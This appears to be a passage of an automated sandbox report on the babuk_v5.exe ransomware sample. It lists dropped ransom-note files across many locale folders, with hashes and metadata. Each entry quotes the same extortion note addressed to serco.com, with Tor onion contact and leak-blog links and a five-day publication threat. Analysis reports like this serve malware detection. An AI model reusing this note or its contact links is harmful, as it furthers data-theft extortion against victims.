                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ha-Latn-NG\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\he-IL\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\hi-IN\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\hr-BA\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\hr-HR\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\hu-HU\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\hy-AM\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\id-ID\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\it-CH\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\it-IT\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ka-GE\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\kk-KZ\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\lt-LT\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\lv-LV\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\mk-MK\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ms-BN\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ms-MY\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
